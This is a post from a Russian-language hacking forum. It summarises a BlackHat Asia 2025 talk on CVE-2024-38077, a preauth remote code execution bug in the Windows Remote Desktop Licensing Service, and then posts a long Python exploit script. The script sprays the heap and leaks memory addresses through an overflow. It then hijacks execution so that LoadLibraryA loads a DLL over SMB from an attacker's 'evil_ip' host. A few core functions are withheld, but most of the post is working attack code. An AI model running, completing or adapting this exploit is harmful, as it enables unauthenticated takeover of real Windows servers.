• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга [BlackHat Asia 2025] One Bug to Rule Them All: Stably Exploiting a Preauth RCE Vulnerability on Windows Server 2025

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3
Забанен
Регистрация
19.12.2018
Сообщения
3 301
Решения
11
Реакции
4 622
Депозит
0.0001
Пожалуйста, обратите внимание, что пользователь заблокирован
Description
As new security protection mechanisms are continually proposed and applied to the Windows operating system, it is becoming increasingly difficult to find exploitable vulnerabilities on current Windows, especially vulnerabilities that can cause preauth 0-click RCE. But are there really no such vulnerabilities?

A few months ago, we conducted an in-depth analysis of the Windows Remote Desktop Services and found several preauth RCE vulnerabilities in the Remote Desktop Licensing Service, some of which lead to unauthenticated, non-sandboxed 0-click RCE.

In this talk, we will explore the attack surface of the Remote Desktop Licensing Service, focusing on the newly identified vulnerability, CVE-2024-38077, which impacts all versions of Windows Server from 2003 to 2025. Although Microsoft has been fortifying Windows for decades and no preauth 0-click RCE has been seen in Windows for years, we can still exploit a single memory corruption vulnerability to achieve 0-click preauth RCE on Windows. We will then share our approach to bypassing all the mitigations on the latest Windows Server 2025 and building a 0-click preauth RCE exploit using only CVE-2024-38077.
blackhat.com/asia-25/briefings/schedule/#one-bug-to-rule-them-all-stably-exploiting-a-preauth-rce-vulnerability-on-windows-server--44144

слайды
https://i.blackhat.com/Asia-25/Asia-25-Peng-One-Bug-to-Rule-Them-All.pdf

запись в блоге
https://sites.google.com/site/zhiniangpeng/blogs/MadLicense

Python:
import struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL
from impacket.dcerpc.v5.dtypes import BOOL,ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, BBYTE, LPSTR, PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Crypto.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey



UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0



def p8(x):
    return struct.pack("B", x)

def p16(x):
    return struct.pack("H", x)

def p32(x):
    return struct.pack("I", x)

def p64(x):
    return struct.pack("Q", x)


class CONTEXT_HANDLE(NDRSTRUCT):

    structure = (

        ("Data", "20s=b"),

    )

    def getAlignment(self):

        return 4

class TLSRpcGetVersion(NDRCALL):

    opnum = 0

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("version", PULONG),

    )

class TLSRpcGetVersionResponse(NDRCALL):

    structure = (

        ("version", ULONG),

    )

class TLSRpcConnect(NDRCALL):

    opnum = 1

class TLSRpcConnectResponse(NDRCALL):

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSBLOB(NDRSTRUCT):

    structure = (

        ("cbData", ULONG),

        ("pbData", PBYTE),

    )

class TLSCRYPT_ALGORITHM_IDENTIFIER(NDRSTRUCT):

    structure = (

        ("pszObjId", LPSTR),

        ("Parameters", TLSBLOB),

    )

class TLSCRYPT_BIT_BLOB(NDRSTRUCT):

    structure = (

        ("cbData", DWORD),

        ("pbData", PBYTE),

        ("cUnusedBits", DWORD),

    )

class TLSCERT_PUBLIC_KEY_INFO(NDRSTRUCT):

    structure = (

        ("Algorithm", TLSCRYPT_ALGORITHM_IDENTIFIER),

        ("PublicKey", TLSCRYPT_BIT_BLOB),

    )

class PTLSCERT_PUBLIC_KEY_INFO(NDRPOINTER):

    referent = (

        ("Data", TLSCERT_PUBLIC_KEY_INFO),

    )

class TLSCERT_EXTENSION(NDRSTRUCT):

    structure = (

        ("pszObjId", LPSTR),

        ("fCritical", BOOL),

        ("Value", TLSBLOB),

    )

class TLSCERT_EXTENSION_ARRAY(NDRUniConformantArray):

    item = TLSCERT_EXTENSION

class PTLSCERT_EXTENSION(NDRPOINTER):

    referent = (

        ("Data", TLSCERT_EXTENSION_ARRAY),

    )

class TLSHYDRACERTREQUEST(NDRSTRUCT):

    structure = (

        ("dwHydraVersion", DWORD),

        ("cbEncryptedHwid", DWORD),

        ("pbEncryptedHwid", PBYTE),

        ("szSubjectRdn", PWCHAR),

        ("pSubjectPublicKeyInfo", PTLSCERT_PUBLIC_KEY_INFO),

        ("dwNumCertExtension", DWORD),

        ("pCertExtensions", PTLSCERT_EXTENSION),

    )

class PTLSHYDRACERTREQUEST(NDRPOINTER):

    referent = (

        ("Data", TLSHYDRACERTREQUEST),

    )

class TLSRpcRequestTermServCert(NDRCALL):

    opnum = 34

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("pbRequest", TLSHYDRACERTREQUEST),

        ("cbChallengeData", DWORD),

        ("pdwErrCode", DWORD),

    )

class TLSRpcRequestTermServCertResponse(NDRCALL):

    structure = (

        ("cbChallengeData", ULONG),

        ("pbChallengeData", PBYTE),

        ("pdwErrCode", ULONG),

    )

class TLSRpcRetrieveTermServCert(NDRCALL):

    opnum = 35

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("cbResponseData", DWORD),

        ("pbResponseData", BBYTE),

        ("cbCert", DWORD),

        ("pbCert", BBYTE),

        ("pdwErrCode", DWORD),

    )

class TLSRpcRetrieveTermServCertResponse(NDRCALL):

    structure = (

        ("cbCert", PUINT),

        ("pbCert", BBYTE),

        ("pdwErrCode", PUINT),

    )

class TLSRpcTelephoneRegisterLKP(NDRCALL):

    opnum = 49

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("dwData", ULONG),

        ("pbData", BBYTE),

        ("pdwErrCode", ULONG)

    )

class TLSRpcTelephoneRegisterLKPResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG)

    )

class TLSCHALLENGEDATA(NDRSTRUCT):

    structure = (

        ("dwVersion", ULONG),

        ("dwRandom", ULONG),

        ("cbChallengeData", ULONG),

        ("pbChallengeData", PBYTE),

        ("cbReservedData", ULONG),

        ("pbReservedData", PBYTE),

    )

class PTLSCHALLENGEDATA(NDRPOINTER):

    referent = (

        ("Data", TLSCHALLENGEDATA),

    )

class TLSCHALLENGERESPONSEDATA(NDRSTRUCT):

    structure = (

        ("dwVersion", ULONG),

        ("cbResponseData", ULONG),

        ("pbResponseData", PBYTE),

        ("cbReservedData", ULONG),

        ("pbReservedData", PBYTE),

    )

class PTLSCHALLENGERESPONSEDATA(NDRPOINTER):

    referent = (

        ("Data", TLSCHALLENGERESPONSEDATA),

    )

class TLSRpcChallengeServer(NDRCALL):

    opnum = 44

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("dwClientType", ULONG),

        ("pClientChallenge", TLSCHALLENGEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcChallengeServerResponse(NDRCALL):

    structure = (

        ("pServerResponse", PTLSCHALLENGERESPONSEDATA),

        ("pServerChallenge", PTLSCHALLENGEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcResponseServerChallenge(NDRCALL):

    opnum = 45

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("pClientResponse", TLSCHALLENGERESPONSEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcResponseServerChallengeResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class TLSRpcRegisterLicenseKeyPack(NDRCALL):

    opnum = 38

    structure = (

        ("lpContext", CONTEXT_HANDLE),

        ("arg_1", BBYTE),

        ("arg_2", ULONG),

        ("arg_3", BBYTE),

        ("arg_4", ULONG),

        ("lpKeyPackBlob", BBYTE),

        ("arg_6", ULONG),

        ("pdwErrCode", ULONG),

    )

class TLSRpcRegisterLicenseKeyPackResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class WIDESTR_STRIPPED(WIDESTR):

    length = None

    def __getitem__(self, key):

        if key == 'Data':

            return self.fields[key].decode('utf-16le').rstrip('\x00')

        else:

            return NDR.__getitem__(self,key)

    def getDataLen(self, data, offset=0):

        if self.length is None:

            return super().getDataLen(data, offset)

        return self.length * 2

class WCHAR_ARRAY_256(WIDESTR_STRIPPED):

    length = 256

class LSKeyPack(NDRSTRUCT):

    structure = (

        ("dwVersion", DWORD),

        ("ucKeyPackType", UCHAR),

        ("szCompanyName", WCHAR_ARRAY_256),

        ("szKeyPackId", WCHAR_ARRAY_256),

        ("szProductName", WCHAR_ARRAY_256),

        ("szProductId", WCHAR_ARRAY_256),

        ("szProductDesc", WCHAR_ARRAY_256),

        ("wMajorVersion", WORD),

        ("wMinorVersion", WORD),

        ("dwPlatformType", DWORD),

        ("ucLicenseType", UCHAR),

        ("dwLanguageId", DWORD),

        ("ucChannelOfPurchase", UCHAR),

        ("szBeginSerialNumber", WCHAR_ARRAY_256),

        ("dwTotalLicenseInKeyPack", DWORD),

        ("dwProductFlags", DWORD),

        ("dwKeyPackId", DWORD),

        ("ucKeyPackStatus", UCHAR),

        ("dwActivateDate", DWORD),

        ("dwExpirationDate", DWORD),

        ("dwNumberOfLicenses", DWORD),

    )

class LPLSKeyPack(NDRPOINTER):

    referent = (

        ("Data", LSKeyPack),

    )

class TLSRpcKeyPackEnumNext(NDRCALL):

    opnum = 13

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("lpKeyPack", LPLSKeyPack),

        ("pdwErrCode", ULONG),

    )

class TLSRpcKeyPackEnumNextResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class TLSRpcDisconnect(NDRCALL):

    opnum = 2

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSRpcDisconnectResponse(NDRCALL):

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSRpcGetServerName(NDRCALL):

    opnum = 4

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("serverName", WCHAR),

        ("nameLen", ULONG),

        ("errCode", ULONG),

    )

class TLSRpcGetServerNameResponse(NDRCALL):

    structure = (

        ("serverName", WCHAR),

        ("nameLen", ULONG),

        ("pdwErrCode", ULONG),

    )

def b24encode(data, charmap):

    data = data[::-1]

    data = bytes_to_long(data)

    enc = b""

    while data != 0:

        tmp = data % len(charmap)

        data //= len(charmap)

        enc += charmap[tmp]

    return enc[::-1]

def spray_lfh_chunk(size, loopsize):

    payload = b"\x00" * size

    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)

    for _ in range(loopsize):

        dce.request(reg_lic_keypack)

def disconnect(handle):

    global dce

    disconn = TLSRpcDisconnect()

    disconn["ctx_handle"] = handle

    disconn_res = dce.request(disconn)

    ret = disconn_res["ctx_handle"]

    return ret

def handles_free():

    global handle_lists, heap_base

    sleep(7)

    for i in range(0x8):

        handle = handle_lists[0x400 + i * 2]

        disconnect(handle)

        handle_lists.remove(handle)

def spray_handles(times):

    global dce, handle_lists

    handle_lists = []

    for _ in range(times):

        rpc_conn = TLSRpcConnect()

        res_rpc_conn = dce.request(rpc_conn)

        handle = res_rpc_conn["ctx_handle"]

        handle_lists.append(handle)

def spray_fake_obj(reg_lic_keypack, times = 0x300):

    global dce

    for i in range(times):

        dce.request(reg_lic_keypack)

def construct_TLSRpcTelephoneRegisterLKP(payload):

    global ctx_handle

    print("Hidden to prevent abusing")

    return tls_register_LKP

def construct_overflow_arbread_buf(addr, padding):

    payload = b""

    payload += p64(addr)

    if padding:

        payload += p32(0)

        payload += p32(0)

        payload += p32(1)

    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)

    return tls_register_LKP

def construct_overflow_fake_obj_buf(fake_obj_addr):

    payload = b""

    payload += p64(0)

    payload += p32(0)

    payload += p32(1)

    payload += p32(0)

    payload += p32(1)

    payload += p64(fake_obj_addr)

    payload += p8(1)

    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)

    return tls_register_LKP

def arb_read(addr, padding = False, passZero = False, leakHeapBaseOffset = 0):

    global leak_idx, handle_lists, dce, ctx_handle

    if leakHeapBaseOffset != 0:

        spray_lfh_chunk(0x20, 0x800)

    else:

        spray_lfh_chunk(0x20, 0x400)

    spray_handles(0xc00)

    handles_free()

    serverName = "a" * 0x10

    get_server_name = TLSRpcGetServerName()

    get_server_name["serverName"] = serverName + "\x00"

    get_server_name["nameLen"] = len(serverName) + 1

    get_server_name["errCode"] = 0

    if leakHeapBaseOffset != 0:

        tls_register_LKP = construct_overflow_arbread_buf(addr[0], padding)

    else:

        tls_register_LKP = construct_overflow_arbread_buf(addr, padding)

    pbData = b"c" * 0x10

    tls_blob = TLSBLOB()

    tls_blob["cbData"] = len(pbData)

    tls_blob["pbData"] = pbData

    tls_cert_extension = TLSCERT_EXTENSION()

    tls_cert_extension["pszObjId"] = "d" * 0x10 + "\x00"

    tls_cert_extension["fCritical"] = False

    tls_cert_extension["Value"] = tls_blob

    pbData2 = bytes.fromhex("3048024100bf1be06ab5c535d8e30a3b3dc616ec084ff4f5b9cfb2a30695ccc6c58c37356c938d3c165d980b07882a35f22ac2e580624cc08a2a3391e5e1f608f94764b27d0203010001")

    tls_crypt_bit_blob = TLSCRYPT_BIT_BLOB()

    tls_crypt_bit_blob["cbData"] = len(pbData2)

    tls_crypt_bit_blob["cbData"] = pbData2

    tls_crypt_bit_blob["cUnusedBits"] = 0

    tls_blob2 = TLSBLOB()

    tls_blob2["cbData"] = 0

    tls_blob2["pbData"] = b""

    tls_crypto_algorithm_identifier = TLSCRYPT_ALGORITHM_IDENTIFIER()

    tls_crypto_algorithm_identifier["pszObjId"] = "1.2.840.113549.1.1.1\x00"

    tls_crypto_algorithm_identifier["Parameters"] = tls_blob2

    tls_cert_public_key_info = TLSCERT_PUBLIC_KEY_INFO()

    tls_cert_public_key_info["Algorithm"] = tls_crypto_algorithm_identifier

    tls_cert_public_key_info["PublicKey"] = tls_crypt_bit_blob

    encryptedHwid = b"e" * 0x20

    hydra_cert_request = TLSHYDRACERTREQUEST()

    hydra_cert_request["dwHydraVersion"] = 0

    hydra_cert_request["cbEncryptedHwid"] = len(encryptedHwid)

    hydra_cert_request["pbEncryptedHwid"] = encryptedHwid

    hydra_cert_request["szSubjectRdn"] = "bbb\x00"

    hydra_cert_request["pSubjectPublicKeyInfo"] = tls_cert_public_key_info

    dwNumCertExtension = 0

    hydra_cert_request["dwNumCertExtension"] = dwNumCertExtension

    pbResponseData = b"a" * 0x10

    pbCert = b"b" * 0x10

    count = 0

    while True:

        count += 1

        sleep(5)

        try:

            dce.request(tls_register_LKP)

        except:

            pass

        retAddr = 0x0

        for handle in handle_lists[::-1]:

            if padding:

                get_server_name["ctx_handle"] = handle

                res_get_server_name = dce.request(get_server_name)

                err_code = res_get_server_name["pdwErrCode"]

                if (err_code == 0):

                    continue

            rpc_term_serv_cert = TLSRpcRequestTermServCert()

            rpc_term_serv_cert["phContext"] = handle

            rpc_term_serv_cert["pbRequest"] = hydra_cert_request

            rpc_term_serv_cert["cbChallengeData"] = 0x100

            rpc_term_serv_cert["pdwErrCode"] = 0

            rpc_retrieve_serv_cert = TLSRpcRetrieveTermServCert()

            rpc_retrieve_serv_cert["phContext"] = handle

            rpc_retrieve_serv_cert["cbResponseData"] = len(pbResponseData)

            rpc_retrieve_serv_cert["pbResponseData"] = pbResponseData

            rpc_retrieve_serv_cert["cbCert"] = len(pbCert)

            rpc_retrieve_serv_cert["pbCert"] = pbCert

            rpc_retrieve_serv_cert["pdwErrCode"] = 0

            try:

                res_rpc_term_serv_cert = dce.request(rpc_term_serv_cert)

                res_rpc_retrieve_serv_cert = dce.request(rpc_retrieve_serv_cert)

                data = res_rpc_retrieve_serv_cert["pbCert"]

                if b"n\x00c\x00a\x00c\x00n\x00" not in data:

                    handle_lists.remove(handle)

                    if leak_idx == 0:

                        if leakHeapBaseOffset != 0:

                            for i in range(len(data) - 6):

                                retAddr = data[i+4:i+6] + data[i+2:i+4] + data[i:i+2]

                                retAddr = bytes_to_long(retAddr) - leakHeapBaseOffset

                                if retAddr & 0xffff == 0:

                                    leak_idx = i

                                    print("[+] Find leak_idx: 0x{:x}".format(leak_idx))

                                    return retAddr

                        else:

                            print("[-] Finding leak_idx error!")

                            exit(-1)

                    else:

                        if passZero:

                            data = data[leak_idx:leak_idx+4]

                            retAddr = data[2:4] + data[0:2]

                        else:

                            data = data[leak_idx:leak_idx+6]

                            retAddr = data[4:6] + data[2:4] + data[0:2]

                        retAddr = bytes_to_long(retAddr)

                        return retAddr

            except:

                continue

        if leakHeapBaseOffset != 0:

            if count < len(addr):

                targetAddr = addr[count]

                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, padding)

            else:

                print("G!")

                targetAddr = 0xdeaddeadbeefbeef

                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, True)

        if leakHeapBaseOffset != 0:

            spray_lfh_chunk(0x20, 0x800)

        else:

            spray_lfh_chunk(0x20, 0x400)

        spray_handles(0xc00)

        handles_free()

def construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1, NdrServerCall2_offset = 0x16f50, OSF_SCALL_offset = 0xdff10, LoadLibraryA_offset = 0xf6de0):

    print("Hidden to prevent abusing")

    payload=0

    fake_obj_addr=0

    return payload, fake_obj_addr

def construct_TLSRpcRegisterLicenseKeyPack(payload):

    global ctx_handle

    my_cert_exc = bytes.fromhex("hidden")

    my_cert_sig = bytes.fromhex("hidden")

    TEST_RSA_PUBLIC_MSKEYBLOB = bytes.fromhex("hidden")

    data = b"\x00" * 0x3c

    data += p32(len(payload))

    data += payload

    data += b"\x00" * 0x10

    rsa_pub_key = CryptImportKey(TEST_RSA_PUBLIC_MSKEYBLOB)

    encrypted_data = CryptEncrypt(rsa_pub_key, data)

    key = TEST_RSA_PUBLIC_MSKEYBLOB

    data = encrypted_data

    payload = b""

    payload += p32(len(key))

    payload += key

    payload += p32(len(data))

    payload += data

    reg_lic_keypack = TLSRpcRegisterLicenseKeyPack()

    reg_lic_keypack["lpContext"] = ctx_handle

    reg_lic_keypack["arg_1"] = my_cert_sig

    reg_lic_keypack["arg_2"] = len(my_cert_sig)

    reg_lic_keypack["arg_3"] = my_cert_exc

    reg_lic_keypack["arg_4"] = len(my_cert_exc)

    reg_lic_keypack["lpKeyPackBlob"] = payload

    reg_lic_keypack["arg_6"] = len(payload)

    reg_lic_keypack["pdwErrCode"] = 0

    return reg_lic_keypack

def construct_TLSRpcKeyPackEnumNext(handle):

    pLSKeyPack = LSKeyPack()

    pLSKeyPack["dwVersion"] = 1

    pLSKeyPack["ucKeyPackType"] = 1

    pLSKeyPack["szCompanyName"] = "a" * 255 + "\x00"

    pLSKeyPack["szKeyPackId"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductName"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductId"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductDesc"] = "a" * 255 + "\x00"

    pLSKeyPack["wMajorVersion"] = 1

    pLSKeyPack["wMinorVersion"] = 1

    pLSKeyPack["dwPlatformType"] = 1

    pLSKeyPack["ucLicenseType"] = 1

    pLSKeyPack["dwLanguageId"] = 1

    pLSKeyPack["ucChannelOfPurchase"] = 1

    pLSKeyPack["szBeginSerialNumber"] = "a" * 255 + "\x00"

    pLSKeyPack["dwTotalLicenseInKeyPack"] = 1

    pLSKeyPack["dwProductFlags"] = 1

    pLSKeyPack["dwKeyPackId"] = 1

    pLSKeyPack["ucKeyPackStatus"] = 1

    pLSKeyPack["dwActivateDate"] = 1

    pLSKeyPack["dwExpirationDate"] = 1

    pLSKeyPack["dwNumberOfLicenses"] = 1

    rpc_key_pack_enum_next = TLSRpcKeyPackEnumNext()

    rpc_key_pack_enum_next["phContext"] = handle

    rpc_key_pack_enum_next["lpKeyPack"] = pLSKeyPack

    rpc_key_pack_enum_next["pdwErrCode"] = 0

    return rpc_key_pack_enum_next

def hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1):

    global handle_lists, dce

    payload, fake_obj_addr = construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1)

    print("[+] Calculate fake_obj_addr: 0x{:x}".format(fake_obj_addr))

    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)

    print("[*] Hijack rip and rcx")

    print("[*] rip: kernelbase!LoadLibraryA")

    print("[*] rcx: {0}".format(arg1))

    while True:

        spray_fake_obj(reg_lic_keypack)

        spray_lfh_chunk(0x20, 0x800)

        spray_handles(0xc00)

        handles_free()

        tls_register_LKP = construct_overflow_fake_obj_buf(fake_obj_addr)

        try:

            dce.request(tls_register_LKP)

        except:

            pass

        print("[*] Try to connect to server...")

        for handle in handle_lists[::-1]:

            rpc_key_pack_enum_next = construct_TLSRpcKeyPackEnumNext(handle)

            try:

                dce.request(rpc_key_pack_enum_next)

            except:

                pass

        print("[*] Check whether the exploit successed? (Y/N)\t")

        status = input("[*] ")

        if status == "Y" or status == "y":

            print("[+] Exploit success!")

            exit(0)

def connect_to_license_server(target_ip):

    global dce, rpctransport, ctx_handle

    stringbinding = epm.hept_map(target_ip, UUID, protocol="ncacn_ip_tcp")

    rpctransport = transport.DCERPCTransportFactory(stringbinding)

    rpctransport.set_connect_timeout(100)

    dce = rpctransport.get_dce_rpc()

    dce.set_auth_level(2)

    dce.connect()

    dce.bind(UUID)

    rpc_conn = TLSRpcConnect()

    res_rpc_conn = dce.request(rpc_conn)

    ctx_handle = res_rpc_conn["ctx_handle"]

    get_version = TLSRpcGetVersion()

    get_version["ctx_handle"] = ctx_handle

    get_version["version"] = 3

    res_get_version = dce.request(get_version)

    version = res_get_version["version"]

    print("[+] Get Server version: 0x{:x}".format(version))

    CHAL_DATA = b"a" * 0x10

    RESV_DATA = b"b" * 0x10

    cli_chal = TLSCHALLENGEDATA()

    cli_chal["dwVersion"] = 0x10000

    cli_chal["dwRandom"] = 0x4

    cli_chal["cbChallengeData"] = len(CHAL_DATA) + 1

    cli_chal["pbChallengeData"] = CHAL_DATA + b"\x00"

    cli_chal["cbReservedData"] = len(RESV_DATA) + 1

    cli_chal["pbReservedData"] = RESV_DATA + b"\x00"

    chal_server = TLSRpcChallengeServer()

    chal_server["phContext"] = ctx_handle

    chal_server["dwClientType"] = 0

    chal_server["pClientChallenge"] = cli_chal

    chal_server["pdwErrCode"] = 0

    chal_response = dce.request(chal_server)

    g_pszServerGuid = "d63a773e-6799-11d2-96ae-00c04fa3080d".encode("utf-16")[2:]

    dwRandom = chal_response["pServerChallenge"]["dwRandom"]

    pbChallengeData = b"".join(chal_response["pServerChallenge"]["pbChallengeData"])

    pbResponseData = hashlib.md5(pbChallengeData[:dwRandom] + g_pszServerGuid + pbChallengeData[dwRandom:]).digest()

    pClientResponse = TLSCHALLENGERESPONSEDATA()

    pClientResponse["dwVersion"] = 0x10000

    pClientResponse["cbResponseData"] = len(pbResponseData)

    pClientResponse["pbResponseData"] = pbResponseData

    pClientResponse["cbReservedData"] = 0

    pClientResponse["pbReservedData"] = ""

    resp_ser_chal = TLSRpcResponseServerChallenge()

    resp_ser_chal["phContext"] = ctx_handle

    resp_ser_chal["pClientResponse"] = pClientResponse

    resp_ser_chal["pdwErrCode"] = 0

    res_resp_ser_chal = dce.request(resp_ser_chal)

def leak_addr():

    global heap_base, ntdll_base, peb_base, pe_base, rpcrt4_base, kernelbase_base

    heap_offset_list = [0x100008, 0x100008, 0x400000, 0x600000, 0x800000, 0xb00000, 0xd00000, 0xf00000]

    heap_base = arb_read(heap_offset_list, leakHeapBaseOffset = 0x188)

    print("[+] Leak heap_base: 0x{:x}".format(heap_base))

    ntdll_base = arb_read(heap_base + 0x102048, padding = True) - 0x1bd2a8

    print("[+] Leak ntdll_base: 0x{:x}".format(ntdll_base))

    tls_bit_map_addr = ntdll_base + 0x1bd268

    print("[+] Leak tls_bit_map_addr: 0x{:x}".format(tls_bit_map_addr))

    peb_base = arb_read(tls_bit_map_addr, padding = True) - 0x80

    print("[+] Leak peb_base: 0x{:x}".format(peb_base))

    pe_base = arb_read(peb_base + 0x12, padding = True, passZero = True) << 16

    print("[+] Leak pe_base: 0x{:x}".format(pe_base))

    pe_import_table_addr = pe_base + 0x10000

    print("[+] Leak pe_import_table_addr: 0x{:x}".format(pe_import_table_addr))

    rpcrt4_base = arb_read(pe_import_table_addr, padding = True) - 0xa4d70

    print("[+] Leak rpcrt4_base: 0x{:x}".format(rpcrt4_base))

    rpcrt4_import_table_addr = rpcrt4_base + 0xe7bf0

    print("[+] Leak rpcrt4_import_table_addr: 0x{:x}".format(rpcrt4_import_table_addr))

    kernelbase_base = arb_read(rpcrt4_import_table_addr, padding = True) - 0x10aec0

    print("[+] Leak kernelbase_base: 0x{:x}".format(kernelbase_base))

def check_vuln(target_ip):

    print("[-] Not implemented yet.")

    return True

def pwn(target_ip, evil_ip, evil_dll_path, check_vuln_exist):

    global dce, rpctransport, handle_lists, leak_idx, heap_base, rpcrt4_base, kernelbase_base, pe_base, peb_base

    arg1 = "\\\\{0}{1}".format(evil_ip, evil_dll_path)

    print("-" * 0x50)

    print(DESCRIPTION)

    print("\ttarget_ip: {0}\n\tevil_ip: {1}\n\tevil_dll_path: {2}\n\tcheck_vuln_exist: {3}".format(target_ip, evil_ip, arg1, check_vuln_exist))

    if check_vuln_exist:

        if not check_vuln(target_ip):

            print("[-] Failed to check for vulnerability.")

            exit(0)

        else:

            print("[+] Target exists vulnerability, try exploit...")

    for i in range(TRY_TIMES):

        print("-" * 0x50)

        print("[*] Run exploit script for {0} / {1} times".format(i + 1, TRY_TIMES))

        try:

            connect_to_license_server(target_ip)

            leak_addr()

            hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1)

            dce.disconnect()

            rpctransport.disconnect()

        except (ConnectionResetError, DCERPCException) as e:

            if i == TRY_TIMES - 1:

                print("[-] Crashed {0} times, run exploit script failed!".format(TRY_TIMES))

            else:  

                print("[-] Crashed, waiting for the service to restart, need {0} seconds...".format(SLEEP_TIME))

                sleep(SLEEP_TIME)

            handle_lists = []

            leak_idx = 0

            pass

if __name__ == '__main__':
    parse = argparse.ArgumentParser(description = DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll", help="Evil dll path, eg: \\smb\\evil_dll.dll")
    parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False, help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх